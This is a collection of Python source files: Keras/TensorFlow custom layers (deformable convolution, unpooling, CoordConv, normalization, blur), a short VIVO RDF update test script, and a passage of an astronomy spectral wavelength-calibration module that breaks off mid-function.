The layer is basically a updated version of An Jiaoyang's code.
# Notes
- A layer does not use a native CUDA kernel which would have better
performance https://github.com/tensorflow/addons/issues/179
# References
[Deformable Convolutional Networks](https://arxiv.org/abs/1703.06211)
# related code
https://github.com/DHZS/tf-deformable-conv-layer (An Jiaoyang, 2018-10-11)
"""
def __init__(self, filters, kernel_size, num_deformable_group=None, **kwargs):
"""`kernel_size`, `strides` and `dilation_rate` must have the same value in both axis.
:param num_deformable_group: split output channels into groups, offset shared in each group. If
this parameter is None, then set num_deformable_group=filters.
"""
super(DeformableConv2D, self).__init__(kernel_size, **kwargs)
if not self.kernel_size[0] == self.kernel_size[1]:
raise ValueError('Requires square kernel')
if not self.strides[0] == self.strides[1]:
raise ValueError('Requires equal stride')
if not self.dilation_rate[0] == self.dilation_rate[1]:
raise ValueError('Requires equal dilation')
self.filters = filters
if num_deformable_group is None:
num_deformable_group = filters
if filters % num_deformable_group != 0:
raise ValueError('"filters" mod "num_deformable_group" must be zero')
self.num_deformable_group = num_deformable_group
self.kernel = None
self.bias = None
self.offset_layer_kernel = None
self.offset_layer_bias = None
def build(self, input_shape):
input_dim = input_shape[-1]
# kernel_shape = self.kernel_size + (input_dim, self.filters)
# we want to use depth-wise conv
kernel_shape = self.kernel_size + (self.filters * input_dim, 1)
self.kernel = self.add_weight(name='kernel',
shape=kernel_shape,
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
trainable=True,
dtype=self.dtype)
if self.use_bias:
self.bias = self.add_weight(name='bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
# create offset conv layer
offset_num = self.kernel_size[0] * self.kernel_size[1] * self.num_deformable_group
self.offset_layer_kernel = self.add_weight(name='offset_layer_kernel',
shape=self.kernel_size + (input_dim, offset_num * 2), # 2 means x and y axis
initializer=tf.zeros_initializer(),
regularizer=self.kernel_regularizer,
trainable=True,
dtype=self.dtype)
self.offset_layer_bias = self.add_weight(name='offset_layer_bias',
shape=(offset_num * 2,),
initializer=tf.zeros_initializer(),
# initializer=tf.random_uniform_initializer(-5, 5),
regularizer=self.bias_regularizer,
trainable=True,
dtype=self.dtype)
self.built = True
    def call(self, inputs, training=None, **kwargs):
        """Apply the deformable convolution.

        Predicts per-position sampling offsets with a plain convolution,
        samples the (padded) input at the offset positions with bilinear
        interpolation, then applies the depth-wise kernel to the resampled
        "big" feature map and sums over input channels per output filter.
        """
        # get offset, shape [batch_size, out_h, out_w, filter_h * filter_w * num_deformable_group * 2]
        offset = tf.nn.conv2d(inputs,
                              filters=self.offset_layer_kernel,
                              strides=[1, *self.strides, 1],
                              padding=self.padding.upper(),
                              dilations=[1, *self.dilation_rate, 1])
        offset += self.offset_layer_bias
        # add padding if needed (sampling below works on raw coordinates)
        inputs = self._pad_input(inputs)
        # some lengths
        batch_size = tf.shape(inputs)[0]
        channel_in = int(inputs.shape[-1])
        in_h, in_w = [int(i) for i in inputs.shape[1: 3]]  # input feature map size
        out_h, out_w = [int(i) for i in offset.shape[1: 3]]  # output feature map size
        filter_h, filter_w = self.kernel_size
        # get x, y axis offset; last dim 0 is y, 1 is x
        offset = tf.reshape(offset, [batch_size, out_h, out_w, -1, 2])
        y_off, x_off = offset[:, :, :, :, 0], offset[:, :, :, :, 1]
        # input feature map grid coordinates for every kernel tap
        y, x = self._get_conv_indices([in_h, in_w])
        y, x = [tf.expand_dims(i, axis=-1) for i in [y, x]]
        y, x = [tf.tile(i, [batch_size, 1, 1, 1, self.num_deformable_group]) for i in [y, x]]
        y, x = [tf.reshape(i, [batch_size, *i.shape[1: 3], -1]) for i in [y, x]]
        y, x = [tf.cast(i, 'float32') for i in [y, x]]
        # add the learned offsets and clamp into the image
        y, x = y + y_off, x + x_off
        y = tf.clip_by_value(y, 0, in_h - 1)
        x = tf.clip_by_value(x, 0, in_w - 1)
        # get four integer corner coordinates around each (y, x)
        y0, x0 = [tf.cast(tf.floor(i), 'int32') for i in [y, x]]
        y1, x1 = y0 + 1, x0 + 1
        # clip corners into the image as well
        y0, y1 = [tf.clip_by_value(i, 0, in_h - 1) for i in [y0, y1]]
        x0, x1 = [tf.clip_by_value(i, 0, in_w - 1) for i in [x0, x1]]
        # gather pixel values at the four corners
        indices = [[y0, x0], [y0, x1], [y1, x0], [y1, x1]]
        p0, p1, p2, p3 = [DeformableConv2D._get_pixel_values_at_point(inputs, i) for i in indices]
        # cast to float for interpolation weights
        x0, x1, y0, y1 = [tf.cast(i, 'float32') for i in [x0, x1, y0, y1]]
        # bilinear weights (areas of opposite sub-rectangles)
        w0 = (y1 - y) * (x1 - x)
        w1 = (y1 - y) * (x - x0)
        w2 = (y - y0) * (x1 - x)
        w3 = (y - y0) * (x - x0)
        # expand dim for broadcast over the channel axis
        w0, w1, w2, w3 = [tf.expand_dims(i, axis=-1) for i in [w0, w1, w2, w3]]
        # bilinear interpolation
        pixels = tf.add_n([w0 * p0, w1 * p1, w2 * p2, w3 * p3])
        # reshape the "big" feature map: each output pixel expands to a
        # filter_h x filter_w tile of sampled values
        pixels = tf.reshape(pixels, [batch_size, out_h, out_w, filter_h, filter_w, self.num_deformable_group, channel_in])
        pixels = tf.transpose(pixels, [0, 1, 3, 2, 4, 5, 6])
        pixels = tf.reshape(pixels, [batch_size, out_h * filter_h, out_w * filter_w, self.num_deformable_group, channel_in])
        # copy channels so each deformable group serves filters//groups filters
        feat_in_group = self.filters // self.num_deformable_group
        pixels = tf.tile(pixels, [1, 1, 1, 1, feat_in_group])
        pixels = tf.reshape(pixels, [batch_size, out_h * filter_h, out_w * filter_w, -1])
        # depth-wise conv with stride = kernel size consumes each tile exactly once
        out = tf.nn.depthwise_conv2d(pixels, self.kernel, [1, filter_h, filter_w, 1], 'VALID')
        # add the output feature maps in the same group (sum over input channels)
        out = tf.reshape(out, [batch_size, out_h, out_w, self.filters, channel_in])
        out = tf.reduce_sum(out, axis=-1)
        if self.use_bias:
            out += self.bias
        return self.activation(out)
def _pad_input(self, inputs):
"""Check if input feature map needs padding, because we don't use the standard Conv() function.
:param inputs:
:return: padded input feature map
"""
# When padding is 'same', we should pad the feature map.
# if padding == 'same', output size should be `ceil(input / stride)`
if self.padding == 'same':
in_shape = inputs.shape.as_list()[1:3]
padding_list = []
for i in range(2):
filter_size = self.kernel_size[i]
dilation = self.dilation_rate[i]
dilated_filter_size = filter_size + (filter_size - 1) * (dilation - 1)
same_output = (in_shape[i] + self.strides[i] - 1) // self.strides[i]
valid_output = (in_shape[i] - dilated_filter_size + self.strides[i]) // self.strides[i]
if same_output == valid_output:
padding_list += [0, 0]
else:
p = dilated_filter_size - 1
p_0 = p // 2
padding_list += [p_0, p - p_0]
if sum(padding_list) != 0:
padding = [[0, 0],
[padding_list[0], padding_list[1]], # top, bottom padding
[padding_list[2], padding_list[3]], # left, right padding
[0, 0]]
inputs = tf.pad(inputs, padding)
return inputs
def _get_conv_indices(self, feature_map_size):
"""the x, y coordinates in the window when a filter sliding on the feature map
:param feature_map_size:
:return: y, x with shape [1, out_h, out_w, filter_h * filter_w]
"""
feat_h, feat_w = [int(i) for i in feature_map_size[0: 2]]
x, y = tf.meshgrid(tf.range(feat_w), tf.range(feat_h))
x, y = [tf.reshape(i, [1, *i.get_shape(), 1]) for i in [x, y]] # shape [1, h, w, 1]
x, y = [tf.image.extract_patches(i,
[1, *self.kernel_size, 1],
[1, *self.strides, 1],
[1, *self.dilation_rate, 1],
'VALID')
for i in [x, y]] # shape [1, out_h, out_w, filter_h * filter_w]
return y, x
@staticmethod
def _get_pixel_values_at_point(inputs, indices):
"""get pixel values
:param inputs:
:param indices: shape [batch_size, H, W, I], I = filter_h * filter_w * channel_out
:return:
"""
y, x = indices
batch, h, w, n = y.shape.as_list()[0: 4]
y_shape = tf.shape(y)
batch, n = y_shape[0], y_shape[3]
batch_idx = tf.reshape(tf.range(0, batch), (batch, 1, 1, 1))
b = tf.tile(batch_idx, (1, h, w, n))
pixel_idx = tf.stack([b, y, x], axis=-1)
return tf.gather_nd(inputs, pixel_idx)
class DepthwiseConv2D(Conv2DBaseLayer):
    """2D depthwise convolution layer.

    Each input channel is convolved with ``depth_multiplier`` separate
    filters, so the output has in_channels * depth_multiplier channels.

    # Arguments
        depth_multiplier: number of filters per input channel
        kernel_size: spatial size of the convolution kernel

    # Notes
        A DepthwiseConv2D layer followed by an 1x1 Conv2D layer is equivalent
        to the SeparableConv2D layer provided by Keras.

    # References
        [Xception: Deep Learning with Depthwise Separable Convolutions](http://arxiv.org/abs/1610.02357)
    """
    def __init__(self, depth_multiplier, kernel_size,
                 kernel_initializer=depthwiseconv_init_relu,
                 **kwargs):
        super(DepthwiseConv2D, self).__init__(kernel_size, kernel_initializer=kernel_initializer, **kwargs)
        self.depth_multiplier = depth_multiplier

    def build(self, input_shape):
        # the layer accepts either a tensor or a list whose first entry is
        # the feature map (isinstance replaces the non-idiomatic `type(...) is list`)
        if isinstance(input_shape, list):
            feature_shape = input_shape[0]
        else:
            feature_shape = input_shape
        kernel_shape = (*self.kernel_size, feature_shape[-1], self.depth_multiplier)
        self.kernel = self.add_weight(name='kernel',
                                      shape=kernel_shape,
                                      initializer=self.kernel_initializer,
                                      regularizer=self.kernel_regularizer,
                                      constraint=self.kernel_constraint,
                                      trainable=True,
                                      dtype=self.dtype)
        if self.use_bias:
            # one bias per output channel (in_channels * depth_multiplier)
            self.bias = self.add_weight(name='bias',
                                        shape=(feature_shape[-1]*self.depth_multiplier,),
                                        initializer=self.bias_initializer,
                                        regularizer=self.bias_regularizer,
                                        constraint=self.bias_constraint,
                                        trainable=True,
                                        dtype=self.dtype)
        else:
            self.bias = None
        super(DepthwiseConv2D, self).build(input_shape)

    def call(self, inputs, **kwargs):
        if isinstance(inputs, list):
            features = inputs[0]
        else:
            features = inputs
        features = K.depthwise_conv2d(features, self.kernel,
                                      strides=self.strides,
                                      padding=self.padding,
                                      dilation_rate=self.dilation_rate)
        if self.use_bias:
            features = tf.add(features, self.bias)
        if self.activation is not None:
            features = self.activation(features)
        return features

    def compute_output_shape(self, input_shape):
        if isinstance(input_shape, list):
            feature_shape = input_shape[0]
        else:
            feature_shape = input_shape
        space = feature_shape[1:-1]
        new_space = []
        for i in range(len(space)):
            # standard conv output-length arithmetic per spatial dimension
            new_dim = conv_utils.conv_output_length(
                space[i],
                self.kernel_size[i],
                padding=self.padding,
                stride=self.strides[i],
                dilation=self.dilation_rate[i])
            new_space.append(new_dim)
        feature_shape = [feature_shape[0], *new_space, feature_shape[-1]*self.depth_multiplier]
        return feature_shape

    def get_config(self):
        config = super(DepthwiseConv2D, self).get_config()
        config.update({
            'depth_multiplier': self.depth_multiplier,
        })
        return config
class MaxPoolingWithArgmax2D(Layer):
    '''MaxPooling for unpooling with indices.

    Returns both the pooled output and the (float-cast) argmax indices so a
    later MaxUnpooling2D layer can scatter values back to their positions.

    # References
        [SegNet: A Deep Convolutional Encoder-Decoder Architecture for Image Segmentation](http://arxiv.org/abs/1511.00561)

    # related code:
        https://github.com/PavlosMelissinos/enet-keras
        https://github.com/ykamikawa/SegNet
    '''
    def __init__(self, pool_size=(2, 2), strides=(2, 2), padding='same', **kwargs):
        super(MaxPoolingWithArgmax2D, self).__init__(**kwargs)
        self.pool_size = conv_utils.normalize_tuple(pool_size, 2, 'pool_size')
        self.strides = conv_utils.normalize_tuple(strides, 2, 'strides')
        self.padding = conv_utils.normalize_padding(padding)

    def call(self, inputs, **kwargs):
        ksize = [1, self.pool_size[0], self.pool_size[1], 1]
        strides = [1, self.strides[0], self.strides[1], 1]
        padding = self.padding.upper()
        output, argmax = nn_ops.max_pool_with_argmax(inputs, ksize, strides, padding)
        # cast so the indices can travel through float tensors/layers
        argmax = tf.cast(argmax, K.floatx())
        return [output, argmax]

    def compute_output_shape(self, input_shape):
        # spatial dimensions shrink by the pooling strides; batch and
        # channel dimensions are unchanged. Previously this was hard-coded
        # to (1, 2, 2, 1) and ignored non-default strides.
        ratio = (1, self.strides[0], self.strides[1], 1)
        output_shape = [dim // ratio[idx] if dim is not None else None for idx, dim in enumerate(input_shape)]
        output_shape = tuple(output_shape)
        return [output_shape, output_shape]

    def compute_mask(self, inputs, mask=None):
        # two outputs, neither carries a mask
        return 2 * [None]

    def get_config(self):
        config = super(MaxPoolingWithArgmax2D, self).get_config()
        config.update({
            'pool_size': self.pool_size,
            'strides': self.strides,
            'padding': self.padding,
        })
        return config
class MaxUnpooling2D(Layer):
    '''Inversion of MaxPooling with indices.

    Takes [pooled_values, argmax] (as produced by MaxPoolingWithArgmax2D)
    and scatters the pooled values back to their original positions in an
    upsampled feature map (zeros elsewhere).

    # References
        [SegNet: A Deep Convolutional Encoder-Decoder Architecture for Image Segmentation](http://arxiv.org/abs/1511.00561)

    # related code:
        https://github.com/PavlosMelissinos/enet-keras
        https://github.com/ykamikawa/SegNet
    '''
    def __init__(self, size=(2, 2), **kwargs):
        super(MaxUnpooling2D, self).__init__(**kwargs)
        # upsampling factor per spatial dimension
        self.size = conv_utils.normalize_tuple(size, 2, 'size')
    def call(self, inputs, output_shape=None):
        updates, mask = inputs[0], inputs[1]
        # mask holds flattened argmax positions (stored as float); recover ints
        mask = tf.cast(mask, 'int32')
        input_shape = tf.shape(updates, out_type='int32')
        # calculation new shape
        if output_shape is None:
            output_shape = (input_shape[0], input_shape[1] * self.size[0], input_shape[2] * self.size[1], input_shape[3])
        # calculation indices for batch, height, width and feature maps
        one_like_mask = K.ones_like(mask, dtype='int32')
        batch_shape = K.concatenate([[input_shape[0]], [1], [1], [1]], axis=0)
        batch_range = K.reshape(tf.range(output_shape[0], dtype='int32'), shape=batch_shape)
        b = one_like_mask * batch_range
        # decode each flat argmax index into (y, x, feature) coordinates of
        # the upsampled output
        y = mask // (output_shape[2] * output_shape[3])
        x = (mask // output_shape[3]) % output_shape[2]
        feature_range = tf.range(output_shape[3], dtype='int32')
        f = one_like_mask * feature_range
        # transpose indices & reshape update values to one dimension
        updates_size = tf.size(updates)
        indices = K.transpose(K.reshape(K.stack([b, y, x, f]), [4, updates_size]))
        values = K.reshape(updates, [updates_size])
        ret = tf.scatter_nd(indices, values, output_shape)
        return ret
    def compute_output_shape(self, input_shape):
        # spatial dims grow by the unpooling size; channels unchanged
        mask_shape = input_shape[1]
        output_shape = [mask_shape[0], mask_shape[1] * self.size[0], mask_shape[2] * self.size[1], mask_shape[3]]
        return tuple(output_shape)
    def get_config(self):
        config = super(MaxUnpooling2D, self).get_config()
        config.update({
            'size': self.size,
        })
        return config
class AddCoords2D(Layer):
    """Add coords to a tensor as described in CoordConv paper.

    # Arguments
        with_r: Boolean flag, whether the r coordinate is added or not. See paper for more details.

    # Input shape
        features: 4D tensor with shape (batch_size, rows, cols, channels)

    # Output shape
        features: same as input except channels + 2, channels + 3 if with_r is True

    # Example
        x = Conv2D(32, 3, padding='same', activation='relu')(x)
        x = AddCoords2D()(x)
        x = Conv2D(32, 3, padding='same', activation='relu')(x)

    # Notes
        Semi-convolutional Operators is an approach that is closely related to CoordConv.

    # References
        [An Intriguing Failing of Convolutional Neural Networks and the CoordConv Solution](http://arxiv.org/abs/1807.03247)
        [Semi-convolutional Operators for Instance Segmentation](https://arxiv.org/abs/1807.10712)
    """
    def __init__(self, with_r=False, **kwargs):
        super(AddCoords2D, self).__init__(**kwargs)
        self.with_r = with_r

    def call(self, features):
        rows = features.shape[1]
        cols = features.shape[2]
        ones = tf.ones_like(features[:, :, :, :1])
        # linear ramps in [-1, 1] along each spatial axis
        row_ramp = tf.range(rows, dtype='float32') / tf.cast(rows - 1, 'float32') * 2 - 1
        col_ramp = tf.range(cols, dtype='float32') / tf.cast(cols - 1, 'float32') * 2 - 1
        yy = ones * row_ramp[None, :, None, None]
        xx = ones * col_ramp[None, None, :, None]
        extra = [yy, xx]
        if self.with_r:
            # radial channel, offset by 0.5 as in the reference implementation
            extra.append(tf.sqrt(tf.square(yy - 0.5) + tf.square(xx - 0.5)))
        return tf.concat([features] + extra, axis=-1)

    def compute_output_shape(self, input_shape):
        shape = list(input_shape)
        shape[3] = shape[3] + (3 if self.with_r else 2)
        return tuple(shape)

    def get_config(self):
        base = super(AddCoords2D, self).get_config()
        base.update({'with_r': self.with_r})
        return base
class LayerNormalization(Layer):
    """Layer Normalization Layer.

    Normalizes each sample over its last (feature) axis, then applies a
    learned per-feature gain (gamma) and offset (beta).

    # References
        [Layer Normalization](http://arxiv.org/abs/1607.06450)
    """
    def __init__(self, eps=1e-6, **kwargs):
        super(LayerNormalization, self).__init__(**kwargs)
        self.eps = eps

    def build(self, input_shape):
        param_shape = input_shape[-1:]
        self.gamma = self.add_weight(name='gamma', shape=param_shape,
                                     initializer=initializers.Ones(), trainable=True)
        self.beta = self.add_weight(name='beta', shape=param_shape,
                                    initializer=initializers.Zeros(), trainable=True)
        super(LayerNormalization, self).build(input_shape)

    def call(self, x):
        # statistics are treated as constants (stop_gradient): gradients flow
        # only through x, gamma, and beta
        mean = tf.stop_gradient(K.mean(x, axis=-1, keepdims=True))
        std = tf.stop_gradient(K.std(x, axis=-1, keepdims=True))
        return self.gamma * (x - mean) / (std + self.eps) + self.beta

    def compute_output_shape(self, input_shape):
        return input_shape

    def get_config(self):
        base = super(LayerNormalization, self).get_config()
        base.update({'eps': self.eps})
        return base
class InstanceNormalization(Layer):
    """Instance Normalization Layer.

    Normalizes each sample over its spatial axes (all but batch and
    channels), then applies a learned per-channel gain and offset.

    # References
        [Instance Normalization: The Missing Ingredient for Fast Stylization](https://arxiv.org/abs/1607.08022)
    """
    def __init__(self, eps=1e-6, **kwargs):
        super(InstanceNormalization, self).__init__(**kwargs)
        self.eps = eps

    def build(self, input_shape):
        param_shape = input_shape[-1:]
        self.gamma = self.add_weight(name='gamma', shape=param_shape,
                                     initializer=initializers.Ones(), trainable=True)
        self.beta = self.add_weight(name='beta', shape=param_shape,
                                    initializer=initializers.Zeros(), trainable=True)
        super(InstanceNormalization, self).build(input_shape)

    def call(self, x):
        # all axes except batch (0) and channels (-1)
        axis = list(range(1, len(x.shape) - 1))
        # statistics are constants w.r.t. gradients (stop_gradient)
        mean = tf.stop_gradient(K.mean(x, axis=axis, keepdims=True))
        std = tf.stop_gradient(K.std(x, axis=axis, keepdims=True))
        return self.gamma * (x - mean) / (std + self.eps) + self.beta

    def compute_output_shape(self, input_shape):
        return input_shape

    def get_config(self):
        base = super(InstanceNormalization, self).get_config()
        base.update({'eps': self.eps})
        return base
def Resize2D(size, method='bilinear'):
    """Spatial resizing layer.

    # Arguments
        size: spatial output size (rows, cols)
        method: 'bilinear', 'bicubic', 'nearest', ...
    """
    def _resize(x):
        return tf.image.resize(x, size, method=method)
    return Lambda(_resize)
class Blur2D(Layer):
    """2D Blur Layer as used in Antialiased CNNs for Subsampling.

    # Arguments
        filter_size: size of the 1D binomial filter (1..7) used to build
            the 2D blur kernel
        strides: subsampling strides
        padding: 'valid' or 'same'

    # Notes
        The layer handles boundary effects similar to AvgPool2D.

    # References
        [Making Convolutional Networks Shift-Invariant Again](https://arxiv.org/abs/1904.11486)

    # related code
        https://github.com/adobe/antialiased-cnns
        https://github.com/adobe/antialiased-cnns/issues/10
    """
    def __init__(self, filter_size=3, strides=2, padding='valid', **kwargs):
        rank = 2
        self.filter_size = filter_size
        self.strides = conv_utils.normalize_tuple(strides, rank, 'strides')
        self.padding = conv_utils.normalize_padding(padding)
        # rows of Pascal's triangle: 1D binomial filter coefficients
        binomial = {
            1: [1.],
            2: [1., 1.],
            3: [1., 2., 1.],
            4: [1., 3., 3., 1.],
            5: [1., 4., 6., 4., 1.],
            6: [1., 5., 10., 10., 5., 1.],
            7: [1., 6., 15., 20., 15., 6., 1.],
        }
        if self.filter_size not in binomial:
            # previously an unsupported size silently left self.a undefined,
            # failing later in build(); fail fast instead
            raise ValueError('filter_size must be in 1..7, got %s' % (filter_size,))
        self.a = np.array(binomial[self.filter_size])
        super(Blur2D, self).__init__(**kwargs)

    def compute_output_shape(self, input_shape):
        feature_shape = input_shape
        space = feature_shape[1:-1]
        new_space = []
        for i in range(len(space)):
            # the blur kernel is filter_size x filter_size with no dilation.
            # (The original referenced self.kernel_size / self.dilation_rate,
            # attributes this layer never defines -> AttributeError.)
            new_dim = conv_utils.conv_output_length(
                space[i],
                self.filter_size,
                padding=self.padding,
                stride=self.strides[i],
                dilation=1)
            new_space.append(new_dim)
        feature_shape = [feature_shape[0], *new_space, feature_shape[3]]
        return feature_shape

    def build(self, input_shape):
        # outer product -> 2D binomial kernel, replicated per input channel
        k = self.a[:, None] * self.a[None, :]
        k = np.tile(k[:, :, None, None], (1, 1, input_shape[-1], 1))
        self.kernel = K.constant(k, dtype=K.floatx())

    def call(self, x):
        features = K.depthwise_conv2d(x, self.kernel, strides=self.strides, padding=self.padding)
        # normalize by the kernel mass actually inside the image so borders
        # are treated like AvgPool2D
        mask = tf.ones_like(x)
        norm = K.depthwise_conv2d(mask, self.kernel, strides=self.strides, padding=self.padding)
        features = tf.multiply(features, 1./norm)
        return features

    def get_config(self):
        config = super(Blur2D, self).get_config()
        config.update({
            'filter_size': self.filter_size,
            'strides': self.strides,
            'padding': self.padding,
        })
        return config
class Scale(Layer):
    """Layer to learn an affine feature scaling: y = scale * x + shift.

    # Arguments
        use_shift: add a learnable per-channel shift (bias)
        use_scale: multiply by a learnable per-channel scale (gain)
        shift_*/scale_* initializer/regularizer/constraint: standard Keras
            weight options for the two parameters
    """
    def __init__(self,
                 use_shift=True,
                 use_scale=True,
                 shift_initializer='zeros',
                 shift_regularizer=None,
                 shift_constraint=None,
                 scale_initializer='ones',
                 scale_regularizer=None,
                 scale_constraint=None,
                 **kwargs):
        super(Scale, self).__init__(**kwargs)
        self.use_shift = use_shift
        self.use_scale = use_scale
        self.shift_initializer = initializers.get(shift_initializer)
        self.shift_regularizer = regularizers.get(shift_regularizer)
        self.shift_constraint = constraints.get(shift_constraint)
        self.scale_initializer = initializers.get(scale_initializer)
        self.scale_regularizer = regularizers.get(scale_regularizer)
        self.scale_constraint = constraints.get(scale_constraint)

    def compute_output_shape(self, input_shape):
        return input_shape

    def build(self, input_shape):
        # add_weight replaces the deprecated add_variable alias
        if self.use_shift:
            self.shift = self.add_weight(name='shift',
                                         shape=(input_shape[-1],),
                                         initializer=self.shift_initializer,
                                         regularizer=self.shift_regularizer,
                                         constraint=self.shift_constraint,
                                         trainable=True,
                                         dtype=self.dtype)
        else:
            # fixed typo: was "self.shfit", leaving self.shift undefined
            self.shift = None
        if self.use_scale:
            self.scale = self.add_weight(name='scale',
                                         shape=(input_shape[-1],),
                                         initializer=self.scale_initializer,
                                         regularizer=self.scale_regularizer,
                                         constraint=self.scale_constraint,
                                         trainable=True,
                                         dtype=self.dtype)
        else:
            self.scale = None
        super(Scale, self).build(input_shape)

    def call(self, inputs, **kwargs):
        x = inputs
        if self.use_scale:
            x = tf.multiply(x, self.scale)
        if self.use_shift:
            x = tf.add(x, self.shift)
        return x

    def get_config(self):
        config = super(Scale, self).get_config()
        config.update({
            'use_shift': self.use_shift,
            'use_scale': self.use_scale,
            'shift_initializer': initializers.serialize(self.shift_initializer),
            'shift_regularizer': regularizers.serialize(self.shift_regularizer),
            'shift_constraint': constraints.serialize(self.shift_constraint),
            'scale_initializer': initializers.serialize(self.scale_initializer),
            'scale_regularizer': regularizers.serialize(self.scale_regularizer),
            'scale_constraint': constraints.serialize(self.scale_constraint),
        })
        return config
| 55,219 | 16,881 |
"""
test_update_resource_property.py -- Given a VIVO URI, a predicate, and two
URIs -- VIVO resource URI and the source URI, generate the add and subtract
RDF necessary to execute "five case logic" in updating VIVO with an
authoritative source URI.
Note. In common use, the source data is presented with a "key" value, not
a URI. The key value must be translated using a dictionary to a URI. For
example, a person might be referred to in source data via a UFID. The
UFID is translated to a URI using a UFID dictionary.
Version 0.1 MC 2013-12-27
-- Initial version.
"""
__author__ = "Michael Conlon"
__copyright__ = "Copyright 2013, University of Florida"
__license__ = "BSD 3-Clause license"
__version__ = "0.1"
import vivotools as vt
from datetime import datetime
print datetime.now(),"Start"
cases = {
"1. VIVO has A, Source Has B": ["A","B"],
"2. VIVO has A and Source also has A": ["A","A"],
"3. VIVO has A, source has no value": ["A",None],
"4. VIVO has no value, Source has B": [None,"B"],
"5. VIVO has no value and Source also has no value": [None,None]
}
for case in sorted(cases.keys()):
print "\n",case,":"
[vivo,source] = cases[case]
[add,sub] = vt.update_resource_property("http://vivo.uri","http://pred.uri",
vivo,source)
print " Add:"
print add
print " Subtract:"
print sub
print datetime.now(),"Finish"
| 1,488 | 488 |
import matplotlib
import matplotlib.pyplot as plt
import os
import pdb
import pickle
import copy
import scipy.signal
import scipy.interpolate
import numpy as np
from astropy.modeling import models, fitting
from astropy.nddata import CCDData, StdDevUncertainty
from astropy.io import ascii, fits
from astropy.convolution import convolve, Box1DKernel, Box2DKernel
import pyvista
from pyvista import image
from pyvista import tv
from tools import plots
ROOT = os.path.dirname(os.path.abspath(__file__)) + '/../../'
class SpecData(CCDData) :
    """ Class to include a wavelength array on top of CCDData, with simple read/write/plot methods

        Can be constructed from either a FITS file name (as written by
        write(): header, data, uncertainty, mask, wave HDUs in that order)
        or from an existing CCDData object plus a wavelength array.
    """
    def __init__(self,data,wave=None) :
        # NOTE(review): CCDData.__init__ is never called; attributes are
        # assigned directly, so any base-class initialization/validation is
        # bypassed -- confirm this is intended
        if type(data) is str :
            # construct from a FITS file written by write() below
            # NOTE(review): the HDUList is never closed; with memory-mapped
            # FITS data the arrays may depend on the open file handle, so
            # closing here could invalidate them -- verify before changing
            hdulist=fits.open(data)
            self.meta = hdulist[0].header
            self.unit = hdulist[0].header['BUNIT']
            self.data = hdulist[1].data
            self.uncertainty = StdDevUncertainty(hdulist[2].data)
            self.mask = hdulist[3].data
            self.wave = hdulist[4].data
        elif type(data) is CCDData :
            # wrap an existing CCDData, attaching the supplied wavelengths
            self.unit = data.unit
            self.meta = data.meta
            self.data = data.data
            self.uncertainty = data.uncertainty
            self.mask = data.mask
            self.wave = wave
        else :
            # NOTE(review): invalid input only prints a message and leaves
            # the object partially constructed rather than raising
            print('Input must be a filename or CCDData object')
    def write(self,file,overwrite=True) :
        """ Write to FITS: header, data, uncertainty, mask, wave HDUs """
        hdulist=fits.HDUList()
        hdulist.append(fits.PrimaryHDU(header=self.meta))
        hdulist.append(fits.ImageHDU(self.data))
        hdulist.append(fits.ImageHDU(self.uncertainty.array))
        hdulist.append(fits.ImageHDU(self.mask.astype(np.int16)))
        hdulist.append(fits.ImageHDU(self.wave))
        hdulist.writeto(file,overwrite=overwrite)
    def plot(self,ax,**kwargs) :
        """ Plot unmasked pixels of each row against wavelength on axes ax """
        for row in range(self.wave.shape[0]) :
            gd = np.where(self.mask[row,:] == False)[0]
            plots.plotl(ax,self.wave[row,gd],self.data[row,gd],**kwargs)
def get_wavecal(file):
    """Load a pickled wavelength-calibration object from a disk file.

    file : path to the pickle file
    """
    with open(file, 'rb') as handle:
        obj = pickle.load(handle)
    return obj
class WaveCal() :
""" Class for wavelength solutions
"""
def __init__ (self,type='chebyshev',degree=2,ydegree=2,pix0=0,orders=[1]) :
""" Initialize the wavecal object
type : type of solution ('poly' or 'chebyshev')
degree : polynomial degree for wavelength
ydegree : polynomial degree for y dimension
pix0 : reference pixel
orders : spectral order for each row
spectrum : spectrum from which fit is derived
"""
self.type = type
self.degree = degree
self.ydegree = ydegree
self.pix0 = pix0
self.orders = orders
self.waves = None
self.x = None
self.y = None
self.weights = None
self.model = None
self.ax = None
def wave(self,pixels=None,image=None) :
""" Wavelength from pixel using wavelength solution model
pix : input pixel positions [x] or [y,x]
image : for input image size [nrows,ncols], return wavelengths at all pixels
returns wavelength
"""
if pixels is not None :
out=np.zeros(len(pixels[0]))
for i,pixel in enumerate(pixels[0]) :
if self.type.find('2D') > 0 :
order=self.orders[pixels[1][i]]
out[i]=self.model(pixel-self.pix0,pixels[1][i])/order
else :
out[i]=self.model(pixel-self.pix0)/self.orders[0]
return out
else :
out=np.zeros(image)
cols=np.arange(out.shape[-1])
if out.ndim == 2 :
for row in range(out.shape[0]) :
rows=np.zeros(len(cols))+row
try : order = self.orders[row]
except : order=self.orders[0]
out[row,:] = self.model(cols-self.pix0,rows)/order
else :
out= self.model(cols-self.pix0)/self.orders[0]
return out
def getmod(self) :
""" Return model for current attributes
"""
if self.type == 'poly' :
mod=models.Polynomial1D(degree=self.degree)
elif self.type == 'chebyshev' :
mod=models.Chebyshev1D(degree=self.degree)
elif self.type == 'chebyshev2D' :
sz=self.spectrum.data.shape
mod=models.Chebyshev2D(x_degree=self.degree,y_degree=self.ydegree,
x_domain=[0,sz[1]],y_domain=[0,sz[0]])
else :
raise ValueError('unknown fitting type: '+self.type)
return
return mod
def fit(self,plot=True) :
""" do a wavelength fit
"""
print("doing wavelength fit")
# set up fitter and model
twod='2D' in self.type
fitter=fitting.LinearLSQFitter()
mod = self.getmod()
if not hasattr(self,'ax') : self.ax = None
if twod :
nold=-1
nbd=0
while nbd != nold :
nold=nbd
self.model=fitter(mod,self.pix-self.pix0,self.y,self.waves*self.waves_order,weights=self.weights)
diff=self.waves-self.wave(pixels=[self.pix,self.y])
gd = np.where(self.weights > 0)[0]
print(' rms: {:8.3f}'.format(diff[gd].std()))
bd = np.where(abs(diff) > 3*diff.std())[0]
nbd = len(bd)
print('rejecting {:d} points from {:d} total: '.format(nbd,len(self.waves)))
self.weights[bd] = 0.
if self.ax is not None :
self.ax[1].cla()
scat=self.ax[1].scatter(self.waves,diff,marker='o',c=self.y,s=2)
scat=self.ax[1].scatter(self.waves[bd],diff[bd],marker='o',c='r',s=2)
